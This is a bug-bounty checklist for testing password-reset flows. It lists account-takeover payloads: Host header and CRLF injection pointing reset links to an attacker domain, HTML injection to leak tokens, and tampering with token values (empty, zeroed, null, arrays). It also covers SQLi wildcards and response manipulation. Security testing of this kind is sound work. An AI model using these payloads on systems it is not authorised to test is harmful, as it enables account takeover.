reset_password_checklist

[ ] a lot of ideas in this article by omer hesham

https://medium.com/bugbountywriteup/hubspot-full-account-takeover-in-bug-bounty-4e2047914ab5

[ ] Use Your Token on Victims Email

POST /reset
...
...
email=victim@gmail.com&token=$YOUR-TOKEN$

[ ] Host Header Injection

POST /reset
Host: attacker.com
...
email=victim@gmail.com

[ ] HTML injection in Host Header

POST /reset
Host: attacker">.com
...
email=victim@gmail.com

[ ] Leakage of Password reset in Referer Header

Referrer: https://website.com/reset?token=1234

[ ] Using Companies Email

While inviting users into your account/organization, you can also try inviting company emails and add a 
new field "password": "example123". or "pass": "example123" in the request. you may end up resetting a
user password

Company emails can be found on target's GitHub Repos members or you can check on http://hunter.io. some users
have a feature to set a password for invited emails, so here we can try adding a pass parameter.

If successful, we can use those credentials to login into the account, SSO integrations, support panels,
etc #BugBountyTips

[ ] CRLF in URL

with CLRF: /resetPassword?0a%0dHost:atracker.tld (x-host, true-client-ip, x-forwarded...)

[ ] HTML injection in Email

HTML injection in email via parameters, cookie, etc > inject image > leak the  token

[ ] Remove token

http://example.com/reset?eamil=victims@gmail.com&token=

[ ] Change it to 0000

http://example.com/reset?eamil=victims@gmail.com&token=0000000000

[ ] Use Null Value

http://example.com/reset?eamil=victims@gmail.com&token=Null/nil

[ ] try an array of old tokens

http://example.com/reset?eamil=victims@gmail.com&token=[oldtoken1,oldtoken2]

[ ] SQLi bypass

try sqli bypass and wildcard or, %, *

[ ] Request Method / Content Type

change request method (get, put, post etc) and/or content type (xml<>json) 

[ ] Response Manipulation

Replace bad response and replace with good one

[ ] Massive Token

http://example.com/reset?eamil=victims@gmail.com&token=1000000 long string

[ ] Crossdomain Token Usage

If a program has multiple domains using same underlying reset mechanism, reset token generated from one domain sometime 
works in another domain too.

[ ] Leaking Reset Token in Response Body [ ] change 1 char at the begin/end to see if the token is evaluated [ ] use unicode char jutzu to spoof email address [ ] look for race conditions [ ] try to register the same mail with different TLD (.eu,.net etc)